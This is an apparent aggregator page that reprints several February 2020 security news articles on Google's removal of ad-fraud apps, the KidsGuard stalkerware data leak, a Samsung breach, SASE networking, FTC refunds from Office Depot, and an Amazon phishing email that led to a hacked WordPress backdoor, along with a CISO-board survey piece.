STE WILLIAMS

You know those ads that obscure your whole screen when you’re trying to make a phone call, unlock your device or use your phone’s GPS?

Technically, they’re called disruptive or out-of-app ads, and they maddeningly pop up outside of the app that hosts them, sometimes causing users to mistakenly click them, thereby frustrating users and wasting advertisers’ money.

On Thursday, Google kicked nearly 600 of the offending apps off its Play store and banned them from its ad monetization platforms, Google AdMob and Google Ad Manager, for violating its disruptive ads policy and disallowed interstitial policy.

Disruptive ads are those that come at you in unexpected ways, including by getting in the way of a device’s functions. While they do occur in-app, Google has recently seen a rise in what it calls “out-of-context ads” – those created by malicious developers who program them to pop up when the user isn’t actually active in their app.

Per Bjorke, Google’s senior product manager for ad traffic quality, said in a Google security blog post that the developers behind these apps keep coming up with ways to deploy them and mask what they’re up to. But Google has been working on technology to detect them, and it’s led to Thursday’s purge:

We recently developed an innovative machine-learning based approach to detect when apps show out-of-context ads, which led to the enforcement we’re announcing today.

Also on Thursday, Google detailed a three-step plan to keep the Play Store and Android ad ecosystem from getting polluted by disruptive ads and other challenges.

One of those steps is doubling down on protecting advertisers from invalid traffic like that coming from disruptive, out-of-app ads. Sweeping the Play store of such apps on Thursday is one example, Google said, given that its investigations are ongoing and it plans to keep taking action against this kind of abuse.

Bjorke told BuzzFeed News that the apps removed on Thursday had been installed more than 4.5 billion times and that they primarily targeted English-speaking users. He also said that the apps mainly came from developers based in China, Hong Kong, Singapore, and India.

Bjorke declined to name specific apps or developers but said that many were utilities or games, although BuzzFeed News reporter Craig Silverman, who’s been reporting about Play Store fraud for a number of years, says that one of the app developers banned on Thursday is Cheetah Mobile, which had about 45 apps removed.

Google says that it’s going to crack down harder on ad policy abusers in the future. It will also publish better tools for app makers to keep compliant with ad industry standards and not annoy Android users.

Finally, Google says it’s going to fundamentally change the Android platform in order to minimize interruptions in app experiences. However, it didn’t elaborate on how it plans to give the user more control over what’s shown on their screen.

---

Latest Naked Security podcast

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/xlWz9s2MFTA/

“KidsGuard?”

What an inappropriate name. It should be called KidsStalk-N-Dox, given that the makers of this consumer-grade stalkerware left a server open and unprotected, regurgitating the private data it slurped up from thousands of victims’ devices after a parent or other surveillance-happy person stealthily installed it.

The spyware app’s unprotected Alibaba cloud storage bucket was found by Till Kottmann. He’s a developer who reverse-engineers apps to see how they tick (or leak, in this case). Kottmann shared a copy of the Android version of KidsGuard with TechCrunch, which first reported on the data breach on Thursday.

Kottmann’s findings amount to “Goodness, Grandma, what enormous bites you take out of victims’ privacy with those big, keyloggy teeth of yours.”

this is sick https://t.co/dSu2AErBYF

—
Till Kottmann (@deletescape) February 16, 2020

KidsGuard comes from a company called ClevGuard that promises that its “excellent products” will deliver “all the information” from a targeted device, including real-time location, text messages, browser history, photos, videos, recordings of phone calls, keylogger data for every keystroke entered and the app where it came from, and all the data from all the social apps – hopping over the end-to-end encryption of, for example, WhatsApp.

According to TechCrunch’s Zack Whittaker, the Alibaba storage bucket was apparently set to public: a common mistake with cloud storage buckets. Another mistake: it was left wide open, without a password.

After TechCrunch contacted ClevGuard, it shut down the exposed cloud storage bucket. The news outlet also contacted Alibaba, which similarly alerted the company about the leak.

Here we go again

KidsGuard is like other many other commercial-grade spyware in that the stalker needs to have physical access to a device in order to install it. It just takes a few minutes. Whittaker reports that after installation, there’s no rooting or jailbreaking required.

ClevGuard says the app can also be used for iPhones without access to the device (as long as the user doesn’t have 2FA on, in which case you would need to access the phone) if you give it the target’s iCloud credentials.

The Android version that TechCrunch and Kottmann checked out also requires that some security features be disabled, such as allowing non-Google approved apps to be installed and disabling Google Play Protect, Google’s built-in malware protection for Android.

After that, it runs in stealth mode, convincingly posing as an Android “system update” app. It’s tough for a victim to know that their device has been boobytrapped, given that there’s no app icon for them to spot.

That leaves KidsGuard to freely siphon photos, videos, recordings of phone calls, and to monitor activity on a slew of apps, including on dating apps such as Tinder. It also secretly takes screenshots of a victim’s conversations in apps such as Snapchat and Signal, which have supposedly ephemeral messages that disappear. As we’ve noted in the past with regards to Snapchat, those messages don’t disappear, KidsGuard being one of many ways for them to be captured.

Cooper Quintin, senior staff technologist at the Electronic Frontier Foundation (EFF), told TechCrunch that it’s “both alarming and sickening” that the exposed data includes not only that of adults, but also of children.

This is evidence that not only are spouseware and stalkerware companies morally bankrupt, they are also often failing to protect their stolen user data once they have it.

KidsGuard isn’t the first spyware maker that has fumbled victims’ data. It happened with MobiiSpy in March 2019. It happened twice with mSpy, which leaked millions of records in September 2018 and, before that, had its database leaked online in 2015.

For its part, Retina-X Studios, the company behind PhoneSheriff, TeenShield, SniperSpy and Mobile Spy, was repeatedly hacked, first in April 2017 and again in February 2018.

Retina-X finally threw in the towel on the surveillance business a month after that… and then had to settle charges brought by the Federal Trade Commission (FTC) for failing to keep its products from being used as illegal stalking apps.

What to do

Whittaker put together a “detect-and-destroy” guide for identifying and removing KidsGuard from your Android phone, but first, you need to to check whether the app has been installed: Go to Settings  Apps, and see if “System Update Service” is listed. This is the name that ClevGuard has given the stalkerware to hide it from the user.

If you think your Android device has been infected with KidsGuard stalkerware, check out the rest of his guide for instructions on removing it.

For iPhone users, Paul Ducklin has the following advice:

If someone has full remote access to your iCloud then you’re in big trouble. They can find out loads about you, and can change it all, too, including resetting your own password and locking you out of your account. So don’t delay, use 2FA today.

If you suspect someone else has access to your iCloud but hasn’t locked you out, go in yourself, change your password and review everything in there, such as what services you are signed up to (are you paying for fleeceware you aren’t even aware of?) and what apps are on your list. Remove anything that you don’t recognise or that shouldn’t be there!

---

Latest Naked Security podcast

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/F2UPHduG6YE/

Samsung has admitted that what it calls a “small number” of users could indeed read other people’s personal data following last week’s unexplained Find my Mobile notification.

Several Register readers wrote in to tell us that, after last Thursday’s mystery push notification, they found strangers’ personal data displayed to them.

Many readers, assuming Samsung had been hacked, logged into its website to change their passwords. Now the company has admitted that a data breach did occur.

A spokeswoman told The Register: “A technical error resulted in a small number of users being able to access the details of another user. As soon as we became of aware of the incident, we removed the ability to log in to the store on our website until the issue was fixed.”

She added: “We will be contacting those affected by the issue with further details.”

From the not-insignificant number of emails El Reg received about the website snafu, it remains to be seen whether Samsung’s definition of “small number” is the same as that of the rest of the world.

Of potentially greater concern is the mystery 1/1 push notification from Find my Mobile, a baked-in app on stock Samsung Android distributions. Although the firm brushed off the worldwide notification as something to do with unspecified internal testing, many of those who wrote to El Reg said they had disabled the app. Stock apps cannot be uninstalled unless one effectively wipes the phone and installs a new operating system – unlocking the bootloader and reformatting with a new third-party, customised ROM.

Samsung did not answer our questions as to how a “disabled” app was able to receive and display push notifications. Nor did it say what other functions this “disabled” app was capable of executing. ®

Sponsored:
Detecting cyber attacks as a small to medium business

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/02/24/samsung_data_breach_find_my_mobile/

Roundup It’s once again time for a security news summary. Let’s get to it.

Student accused of hacking crimes cleared… to attend Swiss hackathon

A college student from Zimbabwe who was hit with eight criminal hacking counts will still get to represent his school at a UN hackathon.

Tatenda Christopher Chinyamakobvu was able to convince a judge to loosen his bail conditions after he was selected to attend the #Hack4SmartSustainableCities event in Switzerland.

Chinyamakobvu was one of a trio of students from Chinhoyi University of Technology who won a local coding contest by developing an application to help first-responders spot and assess the seriousness of emergency reports.

When he wasn’t winning hackathons, however, authorities believe Chinyamakobvu was up to less-than-legal actions, breaking into a university records system in order to change his and other students’ grades.

North Korea’s “Hidden Cobra” group surfaces again

The notorious North Korean hacking operation known as “Hidden Cobra” is active once again.

US-Cert says the group, best known for targeting financial institutions as a way to get around economic sanctions against the Norks, is using an updated version of its “Hoplight” malware to infect targets.

Cash of the Titans: Google offers keys for sale internationally

Good news for Brits who have been coveting a new Titan security key. Google says it will be selling the USB-C version of the plug-in security key in the UK and seven other countries: Austria, Canada, France, Germany, Italy, Japan, Spain, and Switzerland.

While users in those countries could already get the USB-A and Bluetooth versions of the keys, the USB model had not been available. Just remember to read the instructions – if you use it on your phone you will need GPS enabled, as one Reg hack found after a frustrating couple of hours.

HackerOne discloses security hole in… HackerOne

Bug disclosure service HackerOne was in the rare position of publicizing one of its own security holes this week after a researcher discovered a flaw that was exposing some user email addresses.

A researcher using the handle msdian7 was given an $8,500 payout for discovering and reporting how an attacker could game the project invite feature on the site to view the hidden email addresses of other users. The flaw was traced back to a missing access control rule in HackerOne’s new GraphQL system.

Tenable says Microsoft won’t fix Group Policy bug

Security firm Tenable has gone public after Microsoft declined to patch a security issue in Windows.

Tenable says the flaw is in the Group Policy administration tool. An attacker who already had access could elevate their privileges using a customized profile file. This would allow the attacker to do things that would normally be limited by Group Policy settings.

“Bypassing User Group Policy is not the end of the world, but it’s also not something that should be allowed and depending on User Group Policy setup, could result in unfortunate security scenarios,” notes Tenable’s David Wells.

Microsoft, however, does not consider the bug serious, as the profiles are working as intended. Rather, admins should limit user access to those files.

That’s a SlickWrap

A company that makes custom wrap decals for consumer electronics is getting roasted for its shoddy website security.

White-hat researcher Lynx tipped off The Register to this scathing analysis he wrote of the SlickWrap site and its security failings. The infosec bod found found, among other things, exposed customer info and emails from the company, as well as all of its support communications.

On top of that, the biz was said to have completely ignored the security warnings, and was accused of trying to cover evidence of the data exposure. SlickWrap didn’t get back to us.

Adobe AfterEffects gets patch

Adobe AfterEffects has received a security update to address an arbitrary code execution flaw. While this isn’t a particularly dangerous flaw (unless you constantly open untrusted AfterEffects files), it is worth getting patched if you rely on the video editing tool.

Dutch student cuffed for malware

Dutch publication NOS has the story of a 21 year-old student from Utrecht who was arrested and charged with creating trojan tools for other malware writers.

From the sound of it, the student was offering tools that let malware be placed within Word or Excel file macros. He faces at least a year behind bars.

Tech investigator denied US visa

The head of an investigation company that develops technology for media outlets and investigators says he is being barred from the US.

Forensic Architecture boss Eyal Weizman said his visa to enter the US has been revoked because he was apparently linked to a threat to national security. The New York Times reported: “He said that the embassy official had told him that the threat that surfaced could be related to something he was involved in, people he had been in contact with, places he had visited, hotels at which he had stayed, or a pattern of relations among those.”

Man charged for political DDoS attacks

A California bloke was charged with launching a series of distributed-denial-of-service attacks against a candidate running in the Democratic primary against would-be Representative Katie Hill (D-CA).

The FBI believes that Arthur Dam, who was listed as a consultant for Hill, deliberately timed the DDoS attacks to take down the rival’s website at critical times during the race. Hill would narrowly win the primary and go on to win the seat. She has since resigned, for an unrelated sex scandal. ®

Sponsored:
Detecting cyber attacks as a small to medium business

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/02/24/security_roundup_feb_weekthree/

Secure Access Service Edge is a new name for a known and growing architecture designed to strengthen security in cloud environments.

Secure access service edge, also known as SASE (pronounced “sassy”), is a term popping up more in security conversations as businesses grapple with the challenge of secure networking in the cloud.

SASE combines WAN capabilities with network security functions: secure web gateway, cloud access security broker, firewall-as-a-service, and zero-trust network access. These capabilities are primarily delivered as-a-service and aim to find sensitive data or malware, decrypt content, and monitor risk and the trust level of sessions, Gartner’s Andrew Lerner says in a blog post. Monitored entities can span groups of people, devices, applications, services, or Internet of Things systems.

Gartner first mentioned the term SASE in its 2019 networking hype cycle, but it’s not a novel practice. Rather, it’s a new name for a tactic that organizations have been adopting as they navigate new security hurdles amid the transition to cloud- and mobile-intensive environments.

“It’s a combination of different technologies, all of which I think people have been using in one respect or another, but are converging, and adoption of them is accelerating,” says Tom Cross, chief technology officer at OPAQ, describing SASE. “The reason is, enterprise network architectures have not kept up with the way that IT has changed.”

Modern employees use all kinds of devices to access corporate data and applications from a range of geographical locations. The rise of cloud computing and mobility have disrupted the typical technology infrastructure by swapping the physical data center for infrastructure-as-a-service (IaaS). Many IT teams interact with their network through a web console or API. Your data is everywhere, and you don’t have visibility into everything happening on the network.

Legacy enterprise networks have gone through “major upheaval” over the last couple of years, and organizations have been able to reduce cost and increase agility. SD-WAN was designed to address these needs but doesn’t connect to mobile users, explains Dave Greenfield, technology evangelist at Cato Networks. Furthermore, it’s not enough to address their many cloud security concerns.

Many constructs that make up SASE — firewalls, intrusion-prevention systems (IPS), cloud access security brokers (CASB) — are things businesses have used for years. “These can still be applicable as you move into the cloud,” says Mike Rothman, Securosis’ president and analyst. “But there’s this old adage that just because you can doesn’t mean you should.” Organizations don’t often think about how they can build a cloud-native environment that provides capabilities and flexibility they need while adding security into the network stack.

The traditional model of network security is based on inspection points: Traffic is rerouted through a place where it’s inspected to detect attacks. When you overlay existing capabilities with familiar tools, it’s the “lowest common denominator,” he continues. It drives inefficiency, adds cost, and forces traffic into a bottleneck. Organizations don’t need conventional tools scattered throughout their environments if they can segment more effectively in the cloud, which lets them add more accounts and subscriptions instead of a flat data center network.

“It doesn’t make sense to have an on-premises firewall everyone is rerouting their traffic to,” says Cross. “We need a security infrastructure that makes sense in this world and is convenient for people to use, and that they will use. … What we need is for security to be available in the Internet. Security comes to the traffic, not traffic going to security.”

The SASE Approach to Network Security
Instead of thinking about mobile access, cloud access, and site access as separate things, SASE puts it all into a single global network. With this approach, businesses no longer have separate security policies. There is one policy — one firewall for protecting against network-based threats.

“The secure access service edge converges security and networking together for any kind of endpoint,” Rothman explains. Instead of putting an agent on the device, connecting to a VPN, and rerouting to a cloud-based resource, SASE brings security to each individual device. “If I can bring the secure perimeter to the actual user, this allows me to be more efficient,” he adds.

Cloud networking is different. You don’t think about what you already have but about the kind of network a specific application or use case requires. Build what is needed, where it’s needed, Rothman explains in a report on networking in the cloud age. A network for remote employees should be different from one for interconnecting primary sites. Externally facing web applications need a different network than applications used to access sensitive data kept in a data center.

How it works: The SASE architecture is a cloud-native platform, which provides a company with the heavy security processing it requires, Greenfield explains. Each location runs an SD-WAN device to bring traffic into the SASE cloud. Traffic is sent to a local point-of-presence (POP), where networking and security processing is applied before it’s forwarded to its destination. For Cato Networks, POPs are co-located in the same physical data centers as the cloud providers.

“When you’re first starting out, you have to figure out how to get started and sometimes it can be challenging to [do] a whole reconsideration of security infrastructure,” says Cross.

The key is starting small, Rothman explains. Know the problem you’re trying to solve, select a short list of companies that can help you solve it, present the use case, and see how they can help. Over time, you can add more applications, users, and use cases to the SASE environment.

“It doesn’t have to be a big bang. … You can look at it from an application access or user constituency basis,” he continues. “Pick a use case and start somewhere. Don’t expect you’re going to replace your entire network tomorrow with one of these services.” As part of a gradual process, companies may start implementing SASE in a single office and expand from there.

(Story continues on the next page)

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/cloud/all-about-sase-what-it-is-why-its-here-how-to-use-it/d/d-id/1337120?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Victims of dodgy IT support from Office Depot will start receiving compensation checks, a US consumer watchdog said Thursday.

The payouts come from a 2019 settlement the retail giant reached with the FTC, after the biz was accused of letting employees and a computer support provider trick punters into paying for unneeded malware cleanup and security software. Office Depot agreed to fork out $25m while not admitting liability.

The regulator said that, between 2009 and 2016, the retailer and its partner company, support.com, used a rigged scanning tool that returned false positives for malware infections. It is estimated the pair charged more than half a million people for PC repairs and security software they did not really need.

Now, customers can at least take some consolation in a night out, or at least a nice bottle of wine, from their share of the Office Depot payout, plus $10m from Support.com, to settle the FTC’s deceptive practices lawsuit.

Bloke forks out £12m, hands over keys to tropical island to shoo away claims that his web marketing biz was a scam

READ MORE

“The FTC is sending out 541,247 checks averaging $63.35 per check,” the watchdog beamed. “Recipients should deposit or cash checks within 60 days, as indicated on the check.”

For some of the ripped-off customers, however, the payout will only be a fraction of what they originally paid for their unneeded repairs. In its court filing [PDF], the FTC said Office Depot (and Office Max, a subsidiary chain) customers were in some cases charged as much as $300 for bogus malware repairs and unneeded security software.

If you’re in line for a check, it’ll be in the mail, we’re told. The FTC warned people to be on alert for scammers posing as middlemen offering to help folks apply for a refund: ignore these scumbags. ®

Sponsored:
Detecting cyber attacks as a small to medium business

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/02/21/ftc_office_depot_fefunds/

A resurgence in Emotet malware may make it one of the most pervasive security threats of 2020.

When it comes to IT security, there is a natural tendency to focus on next-generation threats. But while awareness of newly discovered threats and vulnerabilities is essential, it is also important not to lose sight of long-established threats. Such is the case with Emotet malware.

As malware goes, Emotet has a surprisingly long history. Emotet malware first gained traction in 2014 as a Trojan that was designed to steal online banking information. Over time, Emotet evolved both in the way that it is delivered and in how it behaves.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/emotet-malware-rears-its-ugly-head-again/d/d-id/1337119?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

This week we discuss why Google abruptly pulled more than 500 Chrome extensions from its Web Store, the case of a man held in custody for refusing to decrypt two hard drives, and research detailing a number of security holes in Bluetooth chipsets.

Greg Iddon plays host and producer this week and is joined by fellow Sophos experts Paul Ducklin and Peter Mackenzie.

Listen now!

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/RNXX7HxPuPc/

Earlier this week, we received a moderately believable Amazon Prime phish via email.

The scam had an Account Locked subject line, with a warning that we wouldn’t be able to buy or sell anything via Amazon’s services until we verified our account.

To add a bit more fear and urgency, the crooks went on to warn us that if we didn’t complete the verification process within 24 hours, then our account would be deactivated, not merely suspended.

The “good” news, of course, is that verifying our account was as easy as clicking a link in the email:

Your Prime Membership Account Has Been Suspended Due To The Following Problems Below:

Invalid Card Number
Your Billing Address Does Not Match Our Records
Unverified Email Address

You will not be able to Buy and Sell on amazon until you have click the link below to confirm your account details before 24hrs of receiving this message.

We will be forced to deactivate your account automatically if you do not verify your identity.

We don’t think that Naked Security readers would fall for this one, for several reasons:

• There are numerous grammatical and spelling mistakes in the message. We think fluent speakers of English would notice these and be suspicious.
• There’s an unreasonable sense of urgency and drama. Amazon almost certainly wouldn’t use words such as “we will be forced to deactivate your account”, and the company wouldn’t need to deactivate your account for failing to respond within a day. (Online services want to keep you as a customer, not to throw you out!)
• The sender doesn’t know who you are. The greeting “Dear Suspended user” looks, and is, peculiar and suspicious.
• There’s no need to click the link in the email. If the email is a scam, the link will be false. But if the email is true, you can simply go to the Amazon site yourself, or use the Amazon app – the online location of Amazon isn’t a secret. Therefore the correct action is never to click, whether you believe the link or not.
• The link the crooks want you to click uses HTTP. Although an HTTPS link would not mean that the page is safe, you should treat all HTTP links as unsafe – even if you trust the website at the other end – because unencrypted web connections can easily be snooped on by other people.

The teachable moment

Nevertheless, we thought we’d follow the phishing link ourselves, just to see how convincing the final result would be – most phishing sites have some sort of “teachable moment” that we can learn from, no matter how smart we think we are already.

Our first steps were simply to check where the link went, rather than downloading the actual content it linked to.

We found that the first hop was to an otherwise-invisible URL on a legitimate business WordPress site that had obviously been hacked and “borrowed” by the crooks to hide their trail.

The main page of the site was still working normally, promoting a PR business with a (rather ironic) tagline in Spanish saying, “It’s the first impression that counts”:

From here the crooks quietly redirected us to a second hacked site, this time a Middle Eastern company selling awnings, canopies and sun-shades:

Once again, the crooks didn’t take us to the front door, but instead pointed us at a usually-invisible URL that even the site operator probably wouldn’t notice unless they carefully went looking for files that shouldn’t be there.

And that’s where we got a surprise!

We don’t know whether the crook who sent us the phishing email made a mistake, and used the wrong URL, or whether a second crook had arrived in the interim and then taken over the hacked server from the original hackers…

…but instead of reaching a page that demanded our Amazon password, which is what we expected, we ended up at the crooks’ very own remote access backdoor:

Pirate skull? Check.

Comic Sans font? Check.

Haxor bragging (including the word haxor)? Check.

Emoticons and needless EXCLAMATION POINTS? Check.

Full remote access with no username or password needed? Check.

In this case, by implanting just one PHP file – a scrambled and obfuscated remote access toolkit – at a known URL they could visit later, the crooks gave themslves an unaudited, unsecured, unlimited remote console to the raw files on the WordPress server.

In other words, the crooks have set things up so they can sidestep the WordPress administration console entirely: they don’t need a password; they won’t get logged by the WordPress system; and they can add and modify files that WordPress wouldn’t normally allow, essentially allowing them to hide content such as phishing pages and malware downloads in plain sight.

Worse still, because their access isn’t mediated by the WordPress administration tools, they can also snoop around on the site where even a WordPress administrator might not be able to go, and upload or edit files that WordPress itself would probably prevent.

What to do?

In the end, this turned into a website insecurity story rather than a phishing alert, and it’s a good reminder of several important facts:

• No website is unimportant to the crooks. Cybercrime isn’t just about million-dollar ransomware attacks on giant corporations. Your website has real value to the criminals, even if it’s just as a jumping-off point for them to enable further crimes.
• If your site gets hacked, you’ll probably end up blocklisted. Once the crooks start using your website to host malicious content, you are likely to end up getting blocked or filtered by security products and the major browsers. This could dissuade or even prevent customers from reaching you. So even if the crooks don’t infect your business, they are very likely to affect it.
• Patches and updates are vital. We don’t know how the crooks got access in this case, but a common entry vector to WordPress sites is via plugins that have security holes that you or your hosting provider forgot to patch. WordPress can keep itself up-to-date, but you also need to keep all the other parts of your system, especially your WordPress plugins, up-to-date as well.

You could also consider investing in a network firewall with web filtering capabilities – web protection isn’t just for users inside your network browsing to the outside.

Security products such as the Sophos XG firewall can also guard you from rogue probes and connections from the outside, adding an extra layer of defence against crooks trying to break in.

Lastly, if you are running your own website, whether it’s on a server that belongs to you or via a cloud service at a hosting company, make sure you pick proper passwords, and turn on 2FA for added login protection if you can.

Remember that crooks who get your password and login just once could leave behind a backdoor, like the one shown here, that gives them unfettered, unaudited and almost undetectable access from then on, even if you change your password.

By the way, if you ever do find yourself wandering in through a crook’s backdoor, like we did here, resist the urge, no matter how tempting, to take a look around “for the sake of research” – you could attract the sort of attention you don’t want.

---

Latest Naked Security podcast

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast. You can also listen directly on Soundcloud.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/9mSp9ocEk8g/

These two groups have talked past each other for years, each hobbled by their own tunnel vision and misperceptions.

Remember the old parable of the blind men touching the elephant? Its lesson is that perspective determines our conclusions, and that we risk missing the big picture if we forget that. Which, in turn, brings us to chief information security officers (CISOs) and boards of directors. For years, these two groups have talked past each other, each hobbled by their own tunnel vision.

More commonly, here’s how that might manifest. The CISO likely looks at the board and thinks, “That’s the money guy… and she’s the lawyer.” And what they have in common is little to no understanding of cybersecurity.

Conversely, boards often view CISOs as just another IT staffer, the woman who tries to stop hackers. And a quality CISOs often share is that they can’t explain the return on the board’s investment or talk about risk in a way that’s meaningful to CXOs and directors.

In the end, neither side understands the other and they fail to unite around their common mission: mitigating enterprise risk. According to two recent studies, however, each side seems to be gaining some vision. Optiv Security’s “The State of the CISO” report and NACD’s “Public Company Governance Survey” provide interesting insight into the state of the relationship between CISOs and boards of directors. These survey-based studies show how CISOs and boards view each other and cybersecurity.

A Convergence of Goals
CISOs historically have had trouble communicating with boards due to the difficulty of connecting cybersecurity programs to business value. On the other side of the table, directors are left wondering how cybersecurity maps to enterprise risk and business enablement, so they view CISOs as technical personnel rather than true C-level business executives.

However, Optiv’s report, which surveyed 100 CISOs from the US and another 100 from the UK, shows that this gap in perception is narrowing considerably. Some 96% of respondents indicated that senior management and directors comprehend cybersecurity more fully now than five years ago, and 86% said they are getting more funding for their programs because of this improved understanding.

Similarly, NACD’s survey of directors found that 79.3% of board members believe their board’s understanding of cyber-risk has significantly improved compared with two years ago. Only 8.7% indicated they did not have enough cyber knowledge to provide effective oversight of cyber risks.

Lingering Disconnects
The communications gap between CISOs and board members appears to be narrowing, but there is still a disconnect when it comes to business priorities. According to the Optiv survey, 76% of CISOs feel that cybersecurity has become so important in their organizations that “CEO tracks” for CISOs will start to emerge. A full 70% of US respondents and 64% of UK respondents said that executive leadership at their company ranks cybersecurity as their top enterprise concern, even if it slows down business.

NACD’s survey does not quite support this sunny CISO perception. Only 28% of responding directors said they prioritize security above all else, even if it slows down business, and 61% said that cybersecurity should not be prioritized above overall business velocity. This perception gap likely would have been wider just a few years ago (prior to directors and CISOs hiking up their respective learning curves), so things seem to be headed in the right direction for CISOs. Nevertheless, the surveys show that CISOs may be a bit optimistic in their view of how boards prioritize cybersecurity today.

Breach Experience: A Scarlet Letter?
One of the most interesting findings across the two surveys is how CISOs and boards view CISO data breach experience. Experiencing a breach was once a “scarlet letter” for CISOs — sometimes costing them their jobs and definitely not something to feature on a resume. Both the Optiv and NACD surveys show this is no longer the case. Boards have a general understanding today that breaches are often unavoidable and that it is the response to the breach, rather than the breach itself, that is the true measure of a CISO’s competence.

In the Optiv survey, 58% of CISOs said that having breach experience makes them more attractive to potential employers than having no breach experience. Surprisingly, CISOs seem to underestimate how boards now value breach experience: A whopping 92% of directors surveyed in the NACD report said that experiencing a breach makes a CISO candidate more attractivebecause they have expertise in helping companies respond and recover.

Board/CISO disconnects are still a challenge for both sides. But at least now they seem to know they are both touching an elephant, and that’s good news for any company that wants to reduce enterprise risk exposure.

Related Content:

• While CISOs Fret, Business Leaders Tout Security Robustness
• Your First Month as a CISO: Forming an Information Security Program
• CISO Pressures: Why the Role Stinks and How to Fix It
• CISOs CIOs: Better Together

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s featured story: “Chaos Order: The Keys to Quantum-Proof Encryption“

Joe Schorr has more than 25 years of professional services and industry experience in information and cybersecurity and currently leads the executive services directors at Optiv. Joe is also a director on the Leading Disruptive Innovation Advisory Board at Stetson University … View Full Bio

Article source: https://www.darkreading.com/careers-and-people/how-to-get-cisos-and-boards-on-the-same-page/a/d-id/1337032?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple